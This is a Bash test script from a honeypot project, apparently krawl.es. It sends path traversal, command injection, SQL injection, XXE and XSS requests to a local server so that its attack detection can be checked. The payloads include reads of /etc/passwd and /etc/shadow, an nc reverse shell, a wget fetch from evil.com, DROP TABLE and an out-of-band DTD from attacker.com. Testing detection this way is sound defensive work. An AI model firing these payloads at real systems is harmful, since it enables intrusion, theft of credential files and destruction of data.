Malin/krawl.es
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
krawl.es/tests/test_all_attacks.sh

339 lines
11 KiB
Bash
Raw Permalink Normal View History

added raw request handling, enanched attack detection for GET and POSTS, templatized suspicioius activity to fetch from wordlists.json, aligned helm to load new wordlist config, added migration scripts from 1.0.0 to new krawl versions, removed old and unused functions, added test scripts
2026-02-08 16:02:18 +01:00
#!/bin/bash
# Test script for all attack types in Krawl honeypot
# Tests: Path Traversal, XXE, Command Injection, SQL Injection, XSS
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# Server configuration
SERVER_URL="${SERVER_URL:-http://localhost:1234}"
SLEEP_TIME="${SLEEP_TIME:-0.5}"
echo -e "${BLUE}======================================${NC}"
echo -e "${BLUE} Krawl Honeypot Attack Test Suite${NC}"
echo -e "${BLUE}======================================${NC}"
echo ""
echo -e "${YELLOW}Testing server: ${SERVER_URL}${NC}"
echo ""
# Function to print test header
test_header() {
echo ""
echo -e "${GREEN}[TEST]${NC} $1"
echo "----------------------------------------"
}
# Function to print request info
request_info() {
echo -e "${YELLOW}Request:${NC} $1"
}
# Function to print response
response_info() {
echo -e "${BLUE}Response (first 200 chars):${NC}"
echo "$1" | head -c 200
echo ""
echo ""
}
#############################################
# PATH TRAVERSAL ATTACKS
#############################################
test_header "Path Traversal - /etc/passwd"
request_info "GET /../../../../etc/passwd"
RESPONSE=$(curl -s "${SERVER_URL}/../../../../etc/passwd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - /etc/shadow"
request_info "GET /../../../etc/shadow"
RESPONSE=$(curl -s "${SERVER_URL}/../../../etc/shadow")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - Windows path"
request_info "GET /..\\..\\..\\windows\\system32\\config\\sam"
RESPONSE=$(curl -s "${SERVER_URL}/..\\..\\..\\windows\\system32\\config\\sam")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - URL encoded"
request_info "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
RESPONSE=$(curl -s "${SERVER_URL}/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - /proc/self/environ"
request_info "GET /../../../../proc/self/environ"
RESPONSE=$(curl -s "${SERVER_URL}/../../../../proc/self/environ")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - config file"
request_info "GET /../../config.php"
RESPONSE=$(curl -s "${SERVER_URL}/../../config.php")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# COMMAND INJECTION ATTACKS
#############################################
test_header "Command Injection - cmd parameter with id"
request_info "GET /test?cmd=id"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - exec parameter with whoami"
request_info "GET /api/search?exec=whoami"
RESPONSE=$(curl -s "${SERVER_URL}/api/search?exec=whoami")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - command parameter with ls"
request_info "GET /admin?command=ls -la"
RESPONSE=$(curl -s "${SERVER_URL}/admin?command=ls%20-la")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - pipe with whoami"
request_info "GET /search?q=test|whoami"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=test|whoami")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - semicolon with id"
request_info "GET /page?id=1;id"
RESPONSE=$(curl -s "${SERVER_URL}/page?id=1;id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - double ampersand with cat"
request_info "GET /view?file=data.txt&&cat /etc/passwd"
RESPONSE=$(curl -s "${SERVER_URL}/view?file=data.txt&&cat%20/etc/passwd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - command substitution"
request_info "GET /test?\$(whoami)"
RESPONSE=$(curl -s "${SERVER_URL}/test?\$(whoami)")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - backticks"
request_info "GET /test?\`id\`"
RESPONSE=$(curl -s "${SERVER_URL}/test?\`id\`")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - /bin/bash"
request_info "GET /shell?cmd=/bin/bash -c 'id'"
RESPONSE=$(curl -s "${SERVER_URL}/shell?cmd=/bin/bash%20-c%20'id'")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - netcat"
request_info "GET /test?cmd=nc -e /bin/sh 192.168.1.1 4444"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=nc%20-e%20/bin/sh%20192.168.1.1%204444")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - wget"
request_info "GET /test?cmd=wget http://evil.com/malware.sh"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=wget%20http://evil.com/malware.sh")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - uname -a"
request_info "GET /info?cmd=uname -a"
RESPONSE=$(curl -s "${SERVER_URL}/info?cmd=uname%20-a")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# SQL INJECTION ATTACKS
#############################################
test_header "SQL Injection - single quote"
request_info "GET /user?id=1'"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - OR 1=1"
request_info "GET /login?user=admin' OR '1'='1"
RESPONSE=$(curl -s "${SERVER_URL}/login?user=admin'%20OR%20'1'='1")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - UNION SELECT"
request_info "GET /product?id=1 UNION SELECT username,password FROM users"
RESPONSE=$(curl -s "${SERVER_URL}/product?id=1%20UNION%20SELECT%20username,password%20FROM%20users")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - SQL comment"
request_info "GET /search?q=test'--"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=test'--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - time-based blind"
request_info "GET /user?id=1' AND SLEEP(5)--"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'%20AND%20SLEEP(5)--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - information_schema"
request_info "GET /search?q=1' UNION SELECT table_name FROM information_schema.tables--"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=1'%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - stacked queries"
request_info "GET /user?id=1; DROP TABLE users--"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1;%20DROP%20TABLE%20users--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - POST request"
request_info "POST /login with username=admin' OR '1'='1"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/login" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin' OR '1'='1&password=anything")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# XXE INJECTION ATTACKS
#############################################
test_header "XXE Injection - file:///etc/passwd"
request_info "POST /api/xml with XXE payload"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/xml" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XXE Injection - external entity"
request_info "POST /api/process with external entity"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "file:///etc/shadow">
]>
<foo>&bar;</foo>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/process" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XXE Injection - parameter entity"
request_info "POST /api/data with parameter entity"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>&send;</data>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/data" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# XSS ATTACKS
#############################################
test_header "XSS - script tag"
request_info "POST /api/contact with <script>alert('XSS')</script>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"Test","email":"test@test.com","message":"<script>alert(\"XSS\")</script>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - img onerror"
request_info "POST /api/contact with <img src=x onerror=alert('XSS')>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"<img src=x onerror=alert(1)>","email":"test@test.com","message":"Test"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - javascript protocol"
request_info "GET /search?q=javascript:alert('XSS')"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=javascript:alert('XSS')")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - svg onload"
request_info "POST /api/comment with <svg onload=alert(1)>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/comment" \
-H "Content-Type: application/json" \
-d '{"comment":"<svg onload=alert(1)>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - iframe"
request_info "POST /api/contact with <iframe src=javascript:alert('XSS')>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"Test","email":"test@test.com","message":"<iframe src=javascript:alert(1)>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# COMBINED ATTACKS
#############################################
test_header "Combined - Command Injection via SQL parameter"
request_info "GET /user?id=1;id"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1;id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Combined - Path Traversal + Command Injection"
request_info "GET /../../../etc/passwd?cmd=cat"
RESPONSE=$(curl -s "${SERVER_URL}/../../../etc/passwd?cmd=cat")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# SUMMARY
#############################################
echo ""
echo -e "${BLUE}======================================${NC}"
echo -e "${BLUE} Test Suite Completed${NC}"
echo -e "${BLUE}======================================${NC}"
echo ""
echo -e "${GREEN}All attack types have been tested.${NC}"
echo -e "${YELLOW}Check the server logs for detection confirmations.${NC}"
echo -e "${YELLOW}Check the dashboard at ${SERVER_URL}/test/dashboard for statistics.${NC}"
echo ""
echo -e "${BLUE}To view the dashboard in browser:${NC}"
echo -e " open ${SERVER_URL}/test/dashboard"
echo ""
echo -e "${BLUE}To check attack types via API:${NC}"
echo -e " curl ${SERVER_URL}/test/api/attack-types"
echo ""
Reference in New Issue Copy Permalink